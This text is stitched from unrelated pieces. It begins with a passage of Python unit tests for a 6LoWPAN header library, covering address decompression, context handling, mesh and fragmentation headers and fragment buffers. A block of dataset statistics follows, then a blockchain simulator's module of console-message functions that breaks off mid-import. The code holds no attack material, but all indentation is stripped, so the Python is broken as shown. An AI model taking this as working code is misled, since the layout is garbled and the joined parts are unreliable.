iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
expected_dst_addr = bytearray([
0xff, addr32b[0], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, addr32b[1], addr32b[2], addr32b[3]
])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(addr32b))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(2, dam)
self.assertEqual(expected_dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr8b = any_8bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_8B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
expected_dst_addr = bytearray([
0xff, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, addr8b[0]
])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(addr8b))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(3, dam)
self.assertEqual(expected_dst_addr, actual_dst_addr)
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_0(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
addr48b = any_48bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
prefix = context.prefix[:8]
if len(prefix) < 8:
missing_bytes_count = 8 - len(prefix)
prefix += bytearray([0x00] * missing_bytes_count)
prefix_length = context.prefix_length
dst_addr = bytearray([0xff]) + addr48b[:2] + bytearray(
[prefix_length]) + prefix + addr48b[2:]
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
dci, io.BytesIO(addr48b))
# THEN
self.assertEqual(1, m)
self.assertEqual(1, dac)
self.assertEqual(0, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr48b = any_48bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_48B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(addr48b))
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr32b = any_32bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_32B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(addr32b))
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_1_and_dam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr8b = any_8bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_8B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(addr8b))
def test_should_merge_pfx_with_addr_bytes_when_merge_method_called_with_pfx_shorter_than_missing_bits(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
prefix = bytearray([0x20, 0x00, 0x0d, 0xb8])
prefix_length = 32
address_bytes = bytearray(
[0x1a, 0x2b, 0x3c, 0x4d, 0x5e, 0x6f, 0x70, 0x81])
addr = prefix + bytearray([0x00] * 4) + address_bytes
# WHEN
actual_addr = factory._merge_prefix_with_address(
prefix, prefix_length, address_bytes)
# THEN
self.assertEqual(addr, actual_addr)
def test_should_merge_pfx_with_addr_bytes_when_merge_method_called_with_pfx_longer_than_missing_bits_overlap(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
prefix = bytearray(
[0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x22])
prefix_length = 68
address_bytes = bytearray(
[0x1a, 0x2b, 0x3c, 0x4d, 0x5e, 0x6f, 0x70, 0x81])
addr = prefix[:-1] + bytearray([0x2a]) + address_bytes[1:]
# WHEN
actual_addr = factory._merge_prefix_with_address(
prefix, prefix_length, address_bytes)
# THEN
self.assertEqual(addr, actual_addr)
def test_should_merge_pfx_with_address_bytes_when_merge_method_called_with_pfx_longer_than_missing_bits(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
prefix = bytearray([
0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x00,
0x11, 0x01, 0x11, 0x01, 0x22
])
prefix_length = 128
address_bytes = bytearray(
[0x1a, 0x2b, 0x3c, 0x4d, 0x5e, 0x6f, 0x70, 0x81])
addr = prefix
# WHEN
actual_addr = factory._merge_prefix_with_address(
prefix, prefix_length, address_bytes)
# THEN
self.assertEqual(addr, actual_addr)
class TestContext(unittest.TestCase):
def test_should_extract_context_from_str_representation_when_constructor_called(
self):
# GIVEN
prefix = "2000:db8::/64"
# WHEN
c = lowpan.Context(prefix)
# THEN
self.assertEqual(
bytearray([0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00]),
c.prefix)
self.assertEqual(64, c.prefix_length)
self.assertEqual(8, c.prefix_length_full_bytes)
def test_should_extract_context_from_bytearray_when_construct_called(self):
# GIVEN
prefix = bytearray([0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00])
# WHEN
c = lowpan.Context(prefix)
# THEN
self.assertEqual(
bytearray([0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00]),
c.prefix)
self.assertEqual(8, c.prefix_length_full_bytes)
self.assertEqual(64, c.prefix_length)
class TestContextManager(unittest.TestCase):
def test_should_raise_IndexError_when_index_is_larger_than_15(self):
# GIVEN
context_manager = lowpan.ContextManager()
index = random.randint(16, 255)
# WHEN
with self.assertRaises(IndexError):
context_manager[index] = any_context()
def test_should_raise_IndexError_when_index_is_smaller_than_0(self):
# GIVEN
context_manager = lowpan.ContextManager()
index = random.randint(-255, -1)
# WHEN
with self.assertRaises(IndexError):
context_manager[index] = any_context()
def test_should_raise_TypeError_when_set_value_is_not_Context(self):
# GIVEN
context_manager = lowpan.ContextManager()
# WHEN
with self.assertRaises(TypeError):
context_manager[0] = int
class TestLowpanMeshHeader(unittest.TestCase):
def test_should_return_hops_left_value_when_hops_left_property_called(self):
# GIVEN
hops_left = any_hops_left()
mesh_header = lowpan.LowpanMeshHeader(hops_left, any_mac_address(),
any_mac_address())
# WHEN
actual_hops_left = mesh_header.hops_left
# THEN
self.assertEqual(hops_left, actual_hops_left)
def test_should_return_originator_address_value_when_originator_address_property_called(
self):
# GIVEN
originator_address = any_mac_address()
mesh_header = lowpan.LowpanMeshHeader(any_hops_left(),
originator_address,
any_mac_address())
# WHEN
actual_originator_address = mesh_header.originator_address
# THEN
self.assertEqual(originator_address, actual_originator_address)
def test_should_return_final_destination_address_value_when_final_destination_address_property_called(
self):
# GIVEN
final_destination_address = any_mac_address()
mesh_header = lowpan.LowpanMeshHeader(any_hops_left(),
any_mac_address(),
final_destination_address)
# WHEN
actual_final_destination_address = mesh_header.final_destination_address
# THEN
self.assertEqual(final_destination_address,
actual_final_destination_address)
class TestLowpanMeshHeaderFactory(unittest.TestCase):
def test_should_create_LowpanMeshHeader_when_parse_method_called(self):
# GIVEN
hops_left = any_hops_left()
originator_address = any_mac_address()
final_destination_address = any_mac_address()
v = int(originator_address.type == common.MacAddressType.SHORT)
f = int(final_destination_address.type == common.MacAddressType.SHORT)
mesh_header_first_byte = (2 << 6) | (v << 5) | (f << 4)
if hops_left >= 0x0f:
mesh_header_data = bytearray(
[mesh_header_first_byte | 0x0f, hops_left])
else:
mesh_header_data = bytearray([mesh_header_first_byte | hops_left])
mesh_header_data += originator_address.mac_address + final_destination_address.mac_address
mesh_header_factory = lowpan.LowpanMeshHeaderFactory()
# WHEN
mesh_header = mesh_header_factory.parse(io.BytesIO(mesh_header_data),
None)
# THEN
self.assertEqual(hops_left, mesh_header.hops_left)
self.assertEqual(originator_address, mesh_header.originator_address)
self.assertEqual(final_destination_address,
mesh_header.final_destination_address)
class TestLowpanFragmentationHeader(unittest.TestCase):
def test_should_return_datagram_size_value_when_datagram_size_property_called(
self):
# GIVEN
datagram_size = any_datagram_size()
fragmentation_header = lowpan.LowpanFragmentationHeader(
datagram_size, any_datagram_tag(), any_datagram_offset())
# WHEN
actual_datagram_size = fragmentation_header.datagram_size
# THEN
self.assertEqual(datagram_size, actual_datagram_size)
def test_should_return_datagram_tag_value_when_datagram_tag_property_called(
self):
# GIVEN
datagram_tag = any_datagram_tag()
fragmentation_header = lowpan.LowpanFragmentationHeader(
any_datagram_size(), datagram_tag, any_datagram_offset())
# WHEN
actual_datagram_tag = fragmentation_header.datagram_tag
# THEN
self.assertEqual(datagram_tag, actual_datagram_tag)
def test_should_return_datagram_offset_value_when_datagram_offset_property_called(
self):
# GIVEN
datagram_offset = any_datagram_offset()
fragmentation_header = lowpan.LowpanFragmentationHeader(
any_datagram_size(), any_datagram_tag(), datagram_offset)
# WHEN
actual_datagram_offset = fragmentation_header.datagram_offset
# THEN
self.assertEqual(datagram_offset, actual_datagram_offset)
def test_should_return_False_when_is_first_property_called_and_datagram_offset_is_not_eq_0(
self):
# GIVEN
datagram_offset = random.randint(1, (1 << 8) - 1)
fragmentation_header = lowpan.LowpanFragmentationHeader(
any_datagram_size(), any_datagram_tag(), datagram_offset)
# WHEN
is_first = fragmentation_header.is_first
# THEN
self.assertFalse(is_first)
def test_should_to_bytes_LowpanFragmentationHeader_from_bytes_when_from_bytes_class_method_called(
self):
# GIVEN
datagram_size = any_datagram_size()
datagram_tag = any_datagram_tag()
datagram_offset = any_datagram_offset()
data = struct.pack(">HHB",
((3 << 14) |
(int(datagram_offset != 0) << 13) | datagram_size),
datagram_tag, datagram_offset)
# WHEN
fragmentation_header = lowpan.LowpanFragmentationHeader.from_bytes(
io.BytesIO(data))
# THEN
self.assertEqual(datagram_size, fragmentation_header.datagram_size)
self.assertEqual(datagram_tag, fragmentation_header.datagram_tag)
self.assertEqual(datagram_offset, fragmentation_header.datagram_offset)
class TestLowpanDecompressor(unittest.TestCase):
def test_should_parse_parent_request_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x3b, 0x02, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x5e, 0xaf, 0x00,
0x15, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x3b,
0xfb, 0x0e, 0x3b, 0x15, 0xa1, 0xf9, 0xf5, 0x64, 0xf4, 0x99, 0xef,
0x70, 0x78, 0x6c, 0x3c, 0x0f, 0x54, 0x4e, 0x95, 0xe8, 0xf5, 0x27,
0x4c, 0xfc
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.source_address.compressed)
self.assertEqual("ff02::2", ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
def test_should_parse_parent_response_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x33, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x0f, 0xe8, 0x00, 0x15,
0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x31, 0xb8,
0x16, 0x02, 0x61, 0xcc, 0x98, 0x90, 0xd6, 0xfd, 0x69, 0xd3, 0x89,
0xa0, 0x30, 0x49, 0x83, 0x7c, 0xf7, 0xb5, 0x7f, 0x83, 0x2a, 0x04,
0xf6, 0x3b, 0x8c, 0xe8, 0xb6, 0x37, 0x51, 0x5b, 0x28, 0x9a, 0x3b,
0xbe, 0x0d, 0xb3, 0x4e, 0x9f, 0xd8, 0x14, 0xc8, 0xc9, 0xf4, 0x28,
0xf6, 0x8d, 0xb7, 0xf0, 0x7d, 0x46, 0x13, 0xc2, 0xb1, 0x69, 0x4d,
0xae, 0xc1, 0x23, 0x16, 0x62, 0x90, 0xea, 0xff, 0x1b, 0xb7, 0xd7,
0x1e, 0x5c
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.source_address.compressed)
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
def test_should_parse_child_id_request_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x33, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x9a, 0x62, 0x00, 0x15,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x14, 0x03,
0xe3, 0x72, 0x50, 0x4f, 0x8c, 0x5c, 0x42, 0x81, 0x68, 0xe2, 0x11,
0xfc, 0xf5, 0x8c, 0x62, 0x8e, 0x83, 0x99, 0xe7, 0x26, 0x86, 0x34,
0x3b, 0xa7, 0x68, 0xc7, 0x93, 0xfb, 0x72, 0xd9, 0xcc, 0x13, 0x5e,
0x5b, 0x96, 0x0e, 0xf1, 0x80, 0x03, 0x55, 0x4f, 0x27, 0xc2, 0x96,
0xf4, 0x9c, 0x65, 0x82, 0x97, 0xcf, 0x97, 0x35, 0x89, 0xc2
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.source_address.compressed)
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
def test_should_parse_child_id_response_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x33, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x7b, 0xe3, 0x00, 0x15,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xe0, 0x57,
0xbf, 0x2f, 0xc0, 0x4b, 0x1d, 0xac, 0x3c, 0x24, 0x16, 0xdf, 0xeb,
0x96, 0xeb, 0xda, 0x42, 0xeb, 0x00, 0x89, 0x5f, 0x39, 0xc9, 0x2b,
0x7d, 0x31, 0xd5, 0x83, 0x9d, 0xdb, 0xb7, 0xc8, 0xe6, 0x25, 0xd3,
0x7a, 0x1e, 0x5f, 0x66, 0x9e, 0x63, 0x2d, 0x42, 0x27, 0x19, 0x41,
0xdc, 0xc4, 0xc4, 0xc0, 0x8c, 0x07
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.source_address.compressed)
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
def test_should_parse_advertisement_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x3b, 0x01, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x35, 0x9f, 0x00,
0x15, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x9e,
0xb8, 0xd0, 0x2f, 0x2a, 0xe0, 0x00, 0x5d, 0x66, 0x63, 0x05, 0xa0,
0x59, 0xb0, 0xd4, 0x95, 0x7f, 0xe6, 0x79, 0x17, 0x87, 0x2c, 0x1d,
0x83, 0xad, 0xc2, 0x64, 0x47, 0x20, 0x7a, 0xe2
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.source_address.compressed)
self.assertEqual("ff02::1", ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
class TestLowpanFragmentsBuffer(unittest.TestCase):
def test_should_raise_ValueError_when_write_method_called_with_data_length_bigger_than_buffer_length(
self):
# GIVEN
length = random.randint(1, 1280)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=(length -
1))
# THEN
self.assertRaises(ValueError, fragments_buffer.write, any_data(length))
def test_should_move_write_position_by_the_data_length_when_write_method_called(
self):
# GIVEN
length = random.randint(1, 1280)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=length)
start_position = fragments_buffer.tell()
data = any_data(length=random.randint(1, length))
# WHEN
fragments_buffer.write(data)
# THEN
self.assertEqual(fragments_buffer.tell() - start_position, len(data))
def test_should_raise_ValueError_when_read_method_called_but_not_whole_packet_has_been_stored_in_buffer(
self):
# GIVEN
data = any_data(length=3)
fragments_buffer = lowpan.LowpanFragmentsBuffer(
buffer_size=random.randint(4, 1280))
fragments_buffer.write(data)
# WHEN
self.assertRaises(ValueError, fragments_buffer.read)
def test_should_raise_ValueError_when_seek_method_called_with_offset_bigger_than_buffer_length(
self):
# GIVEN
offset = random.randint(1281, 2500)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=1280)
# THEN
self.assertRaises(ValueError, fragments_buffer.seek, offset)
def test_should_set_write_position_when_seek_method_called(self):
# GIVEN
length = random.randint(1, 1280)
offset = random.randint(0, length - 1)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=length)
# WHEN
fragments_buffer.seek(offset)
# THEN
self.assertEqual(offset, fragments_buffer.tell())
def test_should_write_whole_packet_to_buffer_when_write_method_called(self):
# GIVEN
data = any_data(length=random.randint(1, 1280))
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=len(data))
# WHEN
fragments_buffer.write(data)
# THEN
self.assertEqual(data, fragments_buffer.read())
def test_should_write_many_frags_to_the_buffer_and_return_whole_message_when_write_method_called_many_times(
self):
# GIVEN
buffer_size = 42
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=buffer_size)
offset_1 = 0
fragment_1 = bytearray([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08])
offset_2 = 8
fragment_2 = bytearray([0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10])
offset_3 = 16
fragment_3 = bytearray([0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18])
offset_4 = 24
fragment_4 = bytearray([0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20])
offset_5 = 32
fragment_5 = bytearray([0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28])
offset_6 = 40
fragment_6 = bytearray([0x29, 0x2a])
# WHEN
fragments_buffer.seek(offset_1)
fragments_buffer.write(fragment_1)
fragments_buffer.seek(offset_2)
fragments_buffer.write(fragment_2)
fragments_buffer.seek(offset_3)
fragments_buffer.write(fragment_3)
fragments_buffer.seek(offset_4)
fragments_buffer.write(fragment_4)
fragments_buffer.seek(offset_5)
fragments_buffer.write(fragment_5)
fragments_buffer.seek(offset_6)
fragments_buffer.write(fragment_6)
# THEN
self.assertEqual(
bytearray([
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a,
0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14,
0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e,
0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
0x29, 0x2a
]), fragments_buffer.read())
class TestLowpanFragmentsBuffersManager(unittest.TestCase):
def test_should_raise_ValueError_when_get_fragments_buffer_method_called_with_invalid_dgram_size(
self):
# GIVEN
message_info = common.MessageInfo()
message_info.source_mac_address = any_mac_address()
message_info.destination_mac_address = any_mac_address()
negative_int = -random.randint(1, 1280)
manager = lowpan.LowpanFragmentsBuffersManager()
# THEN
self.assertRaises(ValueError, manager.get_fragments_buffer,
message_info, any_datagram_tag(), None)
self.assertRaises(ValueError, manager.get_fragments_buffer,
message_info, any_datagram_tag(), negative_int)
def test_should_return_LowpanFragmentsBuffer_when_get_fragments_buffer_method_called_with_valid_dgram_size(
self):
# GIVEN
message_info = common.MessageInfo()
message_info.source_mac_address = any_mac_address()
message_info.destination_mac_address = any_mac_address()
datagram_size = any_datagram_size()
manager = lowpan.LowpanFragmentsBuffersManager()
# WHEN
fragments_buffer = manager.get_fragments_buffer(message_info,
any_datagram_tag(),
datagram_size)
# THEN
self.assertIsInstance(fragments_buffer, lowpan.LowpanFragmentsBuffer)
self.assertEqual(datagram_size, len(fragments_buffer))
if __name__ == "__main__":
unittest.main(verbosity=1)
| 31.58729
| 113
| 0.540461
| 13,774
| 127,739
| 4.753086
| 0.047699
| 0.041669
| 0.043624
| 0.038858
| 0.867907
| 0.844491
| 0.807817
| 0.790298
| 0.75761
| 0.729017
| 0
| 0.171957
| 0.368877
| 127,739
| 4,043
| 114
| 31.595103
| 0.640122
| 0.023572
| 0
| 0.792643
| 0
| 0
| 0.004203
| 0.002998
| 0
| 0
| 0.161112
| 0
| 0.073242
| 1
| 0.043294
| false
| 0
| 0.002604
| 0.012695
| 0.064779
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4644d7f0c17dd024ce57af0eeec62ca4c05913f4
| 25,995
|
py
|
Python
|
output.py
|
akosfenyvesi/fobsim-beeware
|
584d3b956b019fecb3264e6e631e4c91ec40d678
|
[
"CC0-1.0"
] | null | null | null |
output.py
|
akosfenyvesi/fobsim-beeware
|
584d3b956b019fecb3264e6e631e4c91ec40d678
|
[
"CC0-1.0"
] | null | null | null |
output.py
|
akosfenyvesi/fobsim-beeware
|
584d3b956b019fecb3264e6e631e4c91ec40d678
|
[
"CC0-1.0"
] | null | null | null |
def genesis_block_generation():
print("\nGenesis Block is generated. The Blockchain system is up...!")
print("Miners will now collect transactions from memPool and start building blocks...\n\n")
def block_info(block, consensus_algorithm):
print("The following block has been proposed by " + block['Header']['generator_id'] +
" and is generated into the Blockchain network")
print("**************************")
print("transactions:")
print(block['Body']['transactions'])
print("hash:")
print(block['Header']['hash'])
print("timestamp:")
print(block['Body']['timestamp'])
if consensus_algorithm == 1:
print("nonce:")
print(block['Body']['nonce'])
print("previous_hash:")
print(block['Body']['previous_hash'])
print("**************************")
def block_success_addition(self_address, generator_id):
print("*******************************************")
print("the block is now added to the local chain of " + self_address)
if generator_id != self_address:
print("this block was received from " + generator_id)
print("##############################\n")
def simulation_progress(current_chain_length, expected_chain_length):
# print("The simulation have passed " + str(100*((current_chain_length+1)/expected_chain_length)) + "% of TXs to miners")
# print("Miners will mint new valid blocks and generate them to The BC network")
pass
def fork_analysis(number_of_forks):
if number_of_forks == 1:
print("\n##############################\nThere were no forks during this run\n#############################\n")
else:
print("\n##############################\nAs the simulation is finished, " + str(number_of_forks) + " different versions of chains were found\n#############################\n")
def mempool_info(mempool):
print('mempool contains the following TXs:')
txs = []
for i in range(mempool.qsize()):
txs.append(mempool.get())
for tx in txs:
print(tx)
mempool.put(tx)
def authorization_trigger(blockchain_placement, no_fogs, no_miners):
print("please input the address of authorized:")
if blockchain_placement == 1:
print("Fog Nodes")
else:
print("End-users")
print("to generate new blocks in the exact following format:")
print(">>>> 1 OR 3 OR 50 ... (up to: ")
if blockchain_placement == 1:
print(str(no_fogs) + " fog nodes available")
else:
print(str(no_miners) + " miners available in the EU layer")
print("Once done, kindly input: done")
def choose_functionality():
print("Please choose the function of the Blockchain network:\n"
"(1) Data Management\n"
"(2) Computational services\n"
"(3) Payment\n"
"(4) Identity Management\n")
def choose_placement():
print("Please choose the placement of the Blockchain network:\n"
"(1) Fog Layer\n"
"(2) End-User layer\n")
def choose_consensus(dict_of_consensus_algos):
print("\nPlease choose the Consensus algorithm to be used in the simulation:\n")
for key in dict_of_consensus_algos:
print(key + ': ' + dict_of_consensus_algos[key])
def txs_success(txs_per_user, parent_add, self_add):
print(str(txs_per_user) + " data records had been generated by End-User no. " + str(parent_add) + "." + str(self_add))
def GDPR_warning():
print("###########################################"
"\nWARNING: Each end-user's address and the address of the fog component it is connected with,\n "
"will be immutably saved on the chain. This is not a GDPR-compliant practice.\n"
"if you need to have your application GDPR-compliant, you need to change the configuration,\n"
" so that other types of identities be saved on the immutable chain, and re-run the simulation."
"\n###########################################\n")
def miners_are_up():
print("*****************\nMiner nodes are up, connected to their neighbors, and waiting for the genesis block...!\n")
def illegal_tx(tx, wallet_content):
print("the following transaction is illegal:")
print(tx)
print("the end_user_wallet contains only " + str(wallet_content) + " digital coins..!")
print("the transaction is withdrawn from the block")
def illegal_block():
print("The proposed block is not valid."
"\nTransactions will be sent back to the mempool and mined again..!")
def unauthorized_miner_msg(miner_address):
print("Miner: " + miner_address + " is not authorized to generate a new block..!")
def block_discarded():
print("The received block was ignored because it is already in the local chain")
def users_and_fogs_are_up():
print("*****************\nEnd_users are up\nFog nodes are up\nEnd-Users are connected to their Fog nodes...\n")
def user_identity_addition_reminder(Num_endusers):
print("The network has " + str(Num_endusers) +
" end_users.\n For each of them, you need to input the value of newly added identity "
"attributes(if any)\n")
def local_chain_is_updated(miner_address, length_of_local_chain):
print("Using the Gossip protocol of FoBSim, the local chain of the following miner was updated:")
print("Miner: " + str(miner_address))
print("The length of the new local chain: " + str(length_of_local_chain))
def mempool_is_empty():
print("mempool is empty")
def finish():
print("simulation is done.")
print("To check/analyze the experiment, please refer to the temporary folder.")
print("There, you can find:")
print("- miners' local chains")
print("- miners' local records of users' wallets")
print("- log of blocks confirmed by the majority of miners")
print("- log of final amounts in miners' wallets (initial values - staked values + awards)")
print("- log of values which were staked by miners")
print("thank YOU..!")
def main_orig():
import Fog
import end_user
import miner
import blockchain
import random
